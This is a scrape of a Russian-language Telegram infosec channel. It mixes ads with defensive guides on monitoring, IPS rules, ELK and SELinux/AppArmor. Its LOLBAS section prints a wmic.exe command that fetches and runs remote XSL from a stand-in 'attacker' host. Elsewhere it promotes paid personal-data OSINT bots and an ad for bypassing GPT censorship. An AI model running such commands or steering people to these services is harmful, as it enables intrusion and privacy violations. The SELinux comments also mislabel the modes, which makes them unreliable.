CodeGuard: CyberSec Edition

Выживаем в условиях ограниченной доступности - DevOps, SRE, сисадмины, архитекторы и инженеры, этот практикум для вас! 3 декабря в 20:00 мск ведущий DevOps-инженер Михаил Чугунов разберет: 👨‍💻как правильно выстроить пайплайн CI/CD 👨‍💻как организовать DNS, ingress и балансировку 👨‍💻как проектировать архитектуры кластера и сетевого взаимодействия После Практикума “Kubernetes в закрытом контуре”: ✔️DevOps/SRE смогут автоматизировать доставку обновлений и контейнерных образов без внешнего доступа ✔️Сисадмины разберутся, как организовать сетевую топологию, прокси, ingress-контроллеры и DNS в полностью изолированном контуре ✔️Архитекторы поймут, как закладывать ограничения NAT и отсутствие интернета в архитектурные решения ✔️Инженеры БД получат систему, как выстроить безопасную модель доступа, обеспечить комплаенс и защиту данных внутри замкнутой инфраструктуры Kubernetes Для полной погруженности мы дарим видео-курс о Kubernetes - будьте устойчивы и готовы! Забрать уроки: https://tglink.io/9449928914db Реклама. ООО "ОТУС ОНЛАЙН-ОБРАЗОВАНИЕ". ИНН 9705100963. erid: 2W5zFGCagde

👩‍💻 Нашел интерестную шпаргалку по агрессивным инструментам безопасности Linux Думаю, полезно изучит — сохраняй и используй. 😈 CodeGuard: PySec Edition | Чат

Подборка всех рабочих OSINT-ботов в данный момент 🐳 1️⃣ Духless — @orm_robot Один из самых новых ботов на рынке, уже успевший хорошо себя зарекомендовать функционалом и адекватной ценой 2️⃣ Шерлок — @opers_robot Абсолютная классика, один из самых популярных ботов в наше время 3️⃣ Enigma - @mvd_topbot Предоставляет больше информации, чем другие, но оплачивать нужно каждый запрос 4️⃣ Himera - @vip_himerabot Всем известный, культовый сервис. Стоит дорого, но явно есть за что, наиболее эффективный бот 🌟 Но что случилось со старыми сервисами: — ГБ закрыт, его владелец находится где-то за границей — Юзерсбокс закрыт, недавно его задержали в Москве — Бричка отключена, информации нет Пишите на какую тему ходите новую подборку в наш чат 🆘 😈 CodeGuard: PySec Edition | Чат

🥷 Ищем ИБ и OSINT специалистов. Удалёнка, релокейт платим много! Специально для Вас, собираем лучшие вакансии по InfoSec с прямыми контактами в Telegram на канале @it_match_cybersec Подпишись чтобы не упустить свой шанс получить лучший оффер! ➡️ Посмотреть вакансии

📱 Сделал для вас новую подборку крутых бесплатных курсов по информационной безопасности и смежным темам на YouTube.

⏺️ Большой плейлист от CISO — полный разбор основ и актуальных практик ⏺️ Актуальная теория по пентесту за 5 часов — структурированный вводный курс ⏺️ WEB APP этичный хакинг — практический гайд по безопасности веб-приложений ⏺️ Основы кибербезопасности за 3 часа — сжатая база знаний для старта ⏺️ Огромный курс по ИБ от Cisco — глубокое погружение в профессию

Эти ресурсы отлично подходят как для начинающих, так и для тех, кто хочет систематизировать знания и двигаться дальше в сфере кибербезопасности. сохраняй и смотри) ☠️ CodeGuard: PySec Edition | Чат

⭐️ Книга: «Реагирование на инциденты на основе аналитических данных» Авторы: Ребекка Браун, Скотт Дж. Робертс Книга охватывает практические аспекты реагирования на инциденты ИБ и анализа киберугроз, уделяя особое внимание методологии Intelligence-Driven Incident Response (IDIR). В издании подробно раскрыта теория исследования угроз, аналитическая деятельность специалистов и протоколы IDIR, основанные на модели F3EAD: Поиск, Фиксация, Завершение, Эксплойт, Анализ и Распространение (Find, Fix, Finish, Exploit, Analyze, and Disseminate).

👨‍💻 Что внутри: - Основы исследования киберугроз и аналитической работы - Подробное описание процесса IDIR и его этапов (F3EAD) - Практические примеры и протоколы реагирования - Стратегическая аналитика и построение команды аналитиков угроз

Книга идеально подойдет аналитикам кибербезопасности, специалистам по реагированию на инциденты и всем, кто хочет углубить знания в области комплексного анализа и нейтрализации угроз. 💠 Бери книгу → [Arhive] 😈 CodeGuard | Чат

🌟 Автоматизация мониторинга безопасности с Prometheus и Grafana на Linux

Prometheus + Grafana — это не только графики загрузки CPU, но и мощный стек для автоматизации мониторинга безопасности: отслеживание попыток входа, аномалий в сетевой активности, состояния firewall и службы аудита. Ниже мы представили практический гайд, как построить такую систему на базе Linux‑серверов

🔍 Что и как собирать? Базовая схема: 1) Для начала на каждом Linux‑хосте ставим экспортёры, которые отдают метрики по HTTP (порт 9100) 2) Добавляем prometheus, который периодически ходит по endpoint’ам и забирает метрики 3) Grafana подключается к Prometheus, как к источнику данных, и строит дашборды, алерты и панели безопасности 4) Также можно добавить оповещения и RBAC/HTTPS для защиты самих Prometheus/Grafana. — Для безопасности нас интересуют: системные метрики, логи аутентификации, состояние iptables/nftables, службы IDS/IPS и т.п. 😓 Установка Prometheus и node_exporter — На мониторинговом сервере (Prometheus):

# Debian/Ubuntu
sudo useradd -M -r -s /bin/false prometheus
wget https://github.com/prometheus/prometheus/releases/latest/download/prometheus-linux-amd64.tar.gz
tar xzf prometheus-linux-amd64.tar.gz
sudo mv prometheus*/{prometheus,promtool} /usr/local/bin/
sudo mkdir -p /etc/prometheus /var/lib/prometheus

— Конфиг prometheus.yml:

global:
  scrape_interval: 15s
scrape_configs:
  - job_name: "nodes"
    static_configs:
      - targets: ["node1:9100", "node2:9100"]

(❓ Здесь Prometheus каждые 15 секунд опрашивает node_exporter на хостах node1 и node2) — На каждом Linux‑узле:

wget https://github.com/prometheus/node_exporter/releases/latest/download/node_exporter-linux-amd64.tar.gz
tar xzf node_exporter-linux-amd64.tar.gz
sudo mv node_exporter*/node_exporter /usr/local/bin/
sudo useradd -M -r -s /bin/false nodeexp
sudo -u nodeexp /usr/local/bin/node_exporter --web.listen-address=":9100"

(❓ node_exporter отдаёт метрики по /metrics: загрузка, диски, контекстные переключения, сетевые соединения и многое другое) ⚠️ Безопасность самого мониторинга — Ограничьте доступ к портам 9090 (Prometheus), 9100 (node_exporter) и 3000 (Grafana) через firewall, но только с доверенных IP/подсетей — Для node_exporter, если он доступен извне, используйте TLS и базовую аутентификацию за reverse‑proxy и сконфигурируйте Prometheus на HTTPS‑scrape — В Grafana сразу меняйте дефолтный пароль admin, включайте HTTPS и настраивайте роли/группы доступа ⚠️ Grafana: дашборды и алерты — Подключаем Prometheus как источник данных и создаём дашборды: 1) Панель «Security overview» >>> неудачные ssh‑логины по хостам, количество заблокированных IP, активность IDS, число sudo‑операций 2) Панель «Network anomalies >>> входящий/исходящий трафик по интерфейсам, число открытых соединений, количество дропнутых пакетов 3) Панель «Host hardening» >>> состояние firewall, загруженность CPU/IO, свободное место — Alerting в Grafana: 1) Создаём правило, которое срабатывает, например, при N неудачных ssh‑логинах за X минут или при превышении порога дропнутых пакетов 2) Настраиваем уведомления (Telegram bot, email и др.) 3) Группируем алерты по важности: критические (возможный взлом), warning (аномалия), info (регулярные события). 😊 Подведем итоги: Автоматизация мониторинга безопасности с Prometheus и Grafana превращает Linux‑инфраструктуру в прозрачную систему, где видно и железо, и сетевую активность, и попытки взлома, и вообще все, что душе угодно. Prometheus собирает метрики с хостов и служб ИБ, Grafana даёт наглядные дашборды и продвинутый алертинг, а правильное ограничение доступа и шифрование делают сам мониторинг безопасным 😈 CodeGuard: PySec Edition | Чат

Взломы в 2024: хакеры похитили ~$2,2 млрд в крипто – на 21% больше, чем годом ранее. Владимир — бывший разработчик российских и американских IT-компаний. Он объясняет заработок в крипте как систему: шаги, модель, алгоритм, результат. Если вам нужно объяснение “на уровне механики” — здесь вы дома. Половина аудитории — программисты, инженеры и аналитики. Подходит тем, кто любит структурность. А подписчики получают доступ к разбору реальных кейсов 😎 Жмите ➡️ https://t.me/+XcGgqGbqlaszNjI6

♟ На форуме XSS создали самую лучшую и объёмную статью по Nmap, которая описывает его неочевидные функции и возможности ⚠️ Автор последовательно проходит по реальным кейсам использования Nmap:

🎥 Как Nmap взаимодействует с IDS/IPS и как настраивать скан так, чтобы либо не палиться, либо наоборот использовать систему обнаружения вторжений в свою пользу 🎥 Как работать со службами и белыми списками: определение сервисов за портами, обход ограничений и грамотная фильтрация при массовом скане 🎥 Выявление хостов в сети, включая техники, которые помогают находить машины даже в задушенных сегментах с фильтрацией ICMP 🎥 Скрытые варианты сканирования портов, полезные при обходе простых фильтров и логирования

👌 Отдельные большие разделы посвящены:

🎥 Интеграции Nmap с Metasploit: о том, как быстро превращать результаты сканирования в список потенциальных целей и модулей для эксплуатации 🎥 Настройке тайминга и производительности, чтобы балансировать между stealth и скоростью при сканировании крупных подсетей 🎥 Определению операционных систем, сетевых стеков и особенностей хостов по отпечаткам, а также анализу VPN и виртуальных окружений

🖤 Не забыли и про обвязку Nmap:

🎥 Как использовать Zenmap в качестве инструмента для визуализации и автоматизации типовых профилей сканирования, когда нужно повторять одни и те же сценарии 🎥 Использование API Nmap при написании собственных утилит и обёрток 🎥 Глубокий разбор Nmap Scripting Engine: как расширять функционал сканера скриптами, писать свои проверки и автоматизировать рутинные тесты безопасности

➡️ Статью, как всегда, можно изучить в нашем архиве 😈 CodeGuard: PySec Edition | Чат

🔥 Секрет успеха CodeGuard — полезные по ИБ. Если нравиться контент? 👇 https://t.me/boost?c=2675453029 1 буст = 3 ресурса по инфобезу, честно-честно..)) 😈 CodeGuard: PySec Edition | Чат

🤩 Практические примеры настройки и работы с системами предотвращения вторжений (IPS) 1️⃣ Установка Suricata и запуск в IDS‑режиме

sudo apt update && sudo apt install -y suricata
sudo suricata -c /etc/suricata/suricata.yaml -i eth0 -v

— Данные команды ставят Suricata из репозитория и запускают её как обычный IDS. Такой режим удобен для первичной обкатки правил, чтобы не стрелять себе в ногу на боевой сети 2️⃣ Включение IPS

# /etc/suricata/suricata.yaml – фрагмент
af-packet:
  - interface: eth0
    cluster-type: cluster_flow
    cluster-id: 99
    defrag: yes
    copy-mode: ips
    copy-iface: eth1
    buffer-size: 64535
    use-mmap: yes

— Данный фрагмент переводит Suricata в inline‑режим через AF_PACKET: трафик фактически прокачивается через Suricata, и движок может дропать пакеты по правилам 3️⃣ Правило для блокировки вредоносного трафика

local.rules
drop tcp any any -> any 80 (msg:"BLOCK suspicious HTTP user-agent"; \
 content:"BadBot"; http_header; sid:100001; rev:1;)

— Одно из простейших правил IPS: если в HTTP‑заголовке User-Agent встречается строка BadBot, пакет дропается, а событие уходит в лог. В реальной жизни сюда добавляют сигнатуры C2, эксплойтов, сканеров и регэкспы по URI/Host 🐳 В итоге: при аккуратной настройке IPS перестаёт быть кирпичом для сети и превращается в реально полезный фильтр, который режет эксплуатацию известных уязвимостей, сканирование и типовой шум ещё на границе периметра 😈 CodeGuard: PySec Edition | Чат

🗺 Огромная коллекция интерактивных Roadmap'ов по всем направлениям IT Репозиторий developer-roadmap, в котором собраны тонны дорожных карт, гайдов и материалов, которые помогут тебе выстроить обучение, понять что учить и как двигаться дальше.

➡️ Все маршруты кликабельны: можно переходить по шагам и изучать темы глубже ➡️ Регулярные обновления под актуальные тренды и требования рынка ➡️ Есть функции для отслеживания своего прогресса — чтобы видеть, где ты и куда двигаться

Подойдет всем — от новичков до опытных специалистов, которым нужно систематизировать знания или быстро войти в новую область. 🔋 Ссылка для старта 😈 CodeGuard | Чат

😄 Практические знания, которые работают на реальных проектах Хватит теории без применения. Мы собрали проверенные материалы для IT-специалистов: ⭐ Алгоритмы и оптимизация 🔹 Решение задач 🔹 Эффективный код 🔹 Big O на практике ⭐ Архитектура систем 🔹 Сервер с нуля 🔹 Базы данных 🔹 Понимания Ядра Linux ⭐ Инженерное мышление 🔹 Практика и задачи 🔹 Программирование и разработка 🔹 GitLab, DevOps, CI/CD Готовые шаблоны и чек-листы для твоих проектов. ➡️ Сохраняй в закладки

🧠 Ghidra Reversing Tutorials — плейлист роликов для входа в реверс без боли

Ghidra — бесплатный инструмент для reverse engineering от NSA для декомпиляции, анализа бинарей, работы с разными архитектурами и наличием удобного GUI. Но сам по себе такой комбайн легко отпугивает, без хорошего гида можно залипнуть в интерфейсе и так и не дойти до практики

🤩 Сборник роликов Ghidra Reversing Tutorials как раз решает эту проблему — это серия роликов, где автор пошагово проводит через реальную работу реверсера от первого запуска до анализа сложных участков кода 👩‍💻 Что даёт плейлист: • Понимание базового интерфейса Ghidra • Практику по декомпиляции и сопоставлению ассемблера с высоким уровнем, чтобы начать видеть бизнес‑логику в бинаре • Разбор типичных задач ИБ: работа со строками, проверками, модификацию поведения инструмента • Демонстрацию рабочих приёмов, которые реально используют в malware‑анализе и разборе закрытых приложений ⛓ Ссылка на плейлист: [тык] 😈 CodeGuard | Чат

🪖 Подборка сервисов и фреймворков для anti‑phishing — Фишинг остаётся одним из главных векторов атак, поэтому нужен не один волшебный продукт, а стек из инструментов: проверка ссылок и доменов, фильтрация почты, симуляция атак и т.д.

1. Gophish — популярнейший open source фреймворк для эмуляции рассылок, сбора метрик и обучения 2. PhishTank — бесплатная народная база фишинговых сайтов с API, хороший дополнительный источник IOC для быстрой проверки ссылок и интеграции в собственные скрипты и прокси 3. OpenPhish — коммерческий фид URL/домёнов, замеченных в фишинговых кампаниях. Часто используется как источник данных для SIEM, почтовых шлюзов и NGFW 4. VirusTotal — стандарт проверки подозрительных файлов и ссылок, даёт пересечение по десяткам движков и репутационных движков, удобен для ручного и автоматизированного анализа 5. urlscan.io — глубокий разбор URL: скриншоты, DOM, сетевые запросы, редиректы и маппинг на связанные домены; полезен для разборов сложных фишинговых страниц и brand‑impersonation 6. Google Safe Browsing API — проверка ссылок по базе Google; логично использовать как ещё один слой проверки URL в прокси, боте или веб‑приложении 7. Barracuda Email Protection — комплексная защита почты с сильным уклоном в антифишинг и защиту доменной репутации 8. KnowBe4 — один из самых известных сервисов user awareness: фишинговые симуляции, обучение, метрики кликабельности и снижение риска за счёт практики 9. King Phisher — более продвинутый фреймворк для сложных фишинг‑кампаний c шаблонами, трекингом действий пользователей и гибкой кастомизацией. 10. URLhaus / Spamhaus — фиды вредоносных и фишинговых URL или домёнов, которые удобно использовать как источник IOC для почтовых шлюзов, SIEM и систем хантинга

Дальше можно наращивать глубину: добавлять интеграции с SIEM, SOAR, прокси и писать хантинг‑запросы поверх фидов и логов 🖱 😈 Codeguard | Чат

💀 Настройка и анализ журналов безопасности с помощью Elastic Stack (ELK) — В любой современной системе инфобеза журналы являются чуть ли не основными источниками событий. ELK‑стек (Elasticsearch + Logstash + Kibana) позволяет собирать и анализировать огромный поток логов в реальном времени, что критично для обнаружения атак и расследований 🗒 Быстрая стартовая цепочка ELK: 1️⃣ Установка и настройка Filebeat (отправляет журналы с сервера)

sudo apt install filebeat
sudo nano /etc/filebeat/filebeat.yml
filebeat.inputs:
  - type: log
    paths:
      - /var/log/auth.log
      - /var/log/syslog

(Эта настройка берёт базовые Linux‑логи и отправляет их по сети на Logstash для дальнейшего анализа) 2️⃣ Настройка Logstash: фильтруем и парсим события для поиска ключевых деталей

input { beats { port => 5044 } }
filter {
  grok { match => { "message" => "%{SYSLOGTIMESTAMP:timestamp} %{HOSTNAME:host} %{DATA:program} %{GREEDYDATA:msg}" } }
  date { match => [ "timestamp", "MMM  d HH:mm:ss", "MMM dd HH:mm:ss" ] }
}
output { elasticsearch { hosts => ["localhost:9200"] index => "security-logs-%{+YYYY.MM.dd}" } }

(Конфиг Logstash разбирает системные логи: вытаскивает дату, хост, программу, сообщение, чтобы в итоге события лежали в индексах с датой) 3️⃣ В Kibana быстро настраиваем дашборды: — Выбираем нужный индекс “security-logs-*” — Затем задаём фильтры (user, event.type, IP) — Строим графики и ищем всплески активности. Вот и все 👾 👀 Практические лайфхаки: Грок‑фильтры вытаскивают важные поля, визуализации показывают динамику событий, а деление по датам индекс ускоряет расследование и поиск аномалий 📚 Материалы для прокачки: *Официальная документация Filebeat* *Руководство по Grok парсингу* Пишите в чат, на какую тему вы бы хотели получить интересный гайд 👽 😈 CodeGuard | Чат

Айтишник, присаживайся поудобнее: собрали для тебя подборку лучших каналов про ИИ, разработки и языки кода. • Only GPT — твой гид по нейронкам, секретным функциям GPT 5.1 и способам обхода внутренней цензуры. • Only Hack — канал профессионального хакера про приватность и безопасность. • Only Apple — инсайды о новых девайсах Apple и утечки от разработчиков компании. • Only Python — ТОП-1 бесплатные материалы по питону в Интернете. • Only IT — прорывные стартапы, которые задают тренды в индустрии. • Only GitHub — всякие полезности (и бесполезности) с Гитхаба. • Only Tech — все самые свежие и актуальные технологии. • Ну и мемасики про IT конечно Сохраняй в подписках!

😈 Как в Wireshark расшифровать Wi-Fi трафик Начнём с главного — расшифровка Wi-Fi трафика не так проста, как кажется. Просто иметь пароль точки доступа недостаточно. Чтобы расшифровать трафик, нужны: 🔵 Рукопожатие, то самое четырёхэтапное (4-way handshake) между клиентом и точкой доступа, которое происходит перед передачей интересующих данных 🔵 Пароль от сети (ключ для подключения к точке доступа) Без рукопожатия расшифровать перехваченный трафик нельзя, даже если у вас есть пароль.

В Wireshark нужно: 1) Захватить трафик вместе с рукопожатием (например, через Airodump-ng или сам Wireshark в режиме мониторинга) 2) В настройках Wireshark добавить ключ для расшифровки в формате wpa-pwd парол:SSID 3) Включить поддержку IEEE 802.11 в параметрах протокола

После этого трафик станет доступен для анализа — увидите DNS, HTTP запросы и другие полезные пакеты. 🤒 Подробнее руководство тут 😈 CodeGuard | Чат

✨ SELinux и AppArmor: настройка, практические правила и секреты безопасности

«•» При необходимости жёсткой изоляции процессов на хосте на сцену выходят два главных инструмента Mandatory Access Control: SELinux и AppArmor. Оба: маст‑хэв для серверов, рабочих станций, облака. Но чем же они отличаются и как научится их настраивать без боли?

⚠️ SELinux — внедряет контроль на базе меток и в итоге каждая программа, файл и пользователь получает "security context"

/usr/sbin/setenforce 0 # Включаем в режиме permissive
sestatus # Проверяем статус
sudo setenforce 1 # Изменяем режим на enforcing
sudo nano /etc/selinux/config # Делаем его постоянным 
# Меняем SELINUX=permissive на SELINUX=enforcing

❓ PS: "Permissive" — диагностический режим: фиксирует нарушения, не блокирует. "Enforcing" — реально запрещает всё вне правил 🖥️ AppArmor — действует через профили по путям, проще для понимания и администрирования

sudo aa-status # Проверяем статус AppArmor
sudo ln -s /etc/apparmor.d/usr.sbin.nginx /etc/apparmor.d/enable # Включаем профиль для nginx
sudo systemctl reload apparmor # Вносим изменения в профиль
sudo nano /etc/apparmor.d/usr.sbin.nginx
sudo apparmor_parser -r /etc/apparmor.d/usr.sbin.nginx

🤨 Что выбрать? — Выбирайте SELinux, если вам важна высшая гибкость, тонкая настройка политик, хорошая защита от privilege escalation, а также если вы работаете с серверами с жесткими требованиями — Выбирайте AppArmor, если вы новичок, он быстрее оформляется и интегрируется, его легко писать и дебажить профили 🔗Полезные статьи на эту тему: • Core Differences Between SELinux and AppArmor • AppArmor vs SELinux 😈 CodeGuard | Чат

😀 LOLBAS — это каталог легитимных бинарников, скриптов и библиотек Windows, которые могут быть использованы в атаках без отдельного вируса — Проект помогает и red team, и blue team: одним - находить реальные векторы, другим - строить детекты и ограничения 👾 Как устроен LOLBAS и что в нём лежит: — В репозитории хранятся YML-описания для каждого бинарника: имя, путь, подозрительные команды, MITRE ATT&CK и т.д. Это удобно парсить и загружать в SIEM/EDR. Упрощённый пример структуры записи:

Name: WMIC
Category: Binaries
FullPath:
  - Path: C:\Windows\System32\wbem\wmic.exe
Commands:
  - Command: wmic.exe process get brief /format:"http://attacker/payload.xsl"
    Description: Execute script from remote XSL
MitreID:
  - T1218.011

⚽️ Один из типичных кейсов — использование wmic.exe для выполнения кода через XSL-шаблон, хостящийся удалённо:

wmic.exe process get brief /format:"http://attacker/payload.xsl"

• wmic.exe — подписанный Microsoft бинарник • через /format подсовывается XSL с внедрённым скриптом • в итоге код выполняется руками доверенного системного инструмента, что сильно осложняет детект 🛡 Зачем опытному спецу смотреть на LOLBAS? — Генерация правил по конкретным бинарникам и аргументам, привязка к ATT&CK — Ограничение ненужных LOLBins через AppLocker/WDAC/EDR, whitelisting/blacklisting. — Приоритизация подозрительных процессов и команд, основанная на живой базе LOtL‑артефактов 📱 Ссылка на проект: [тык] 😈 CodeGuard | Чат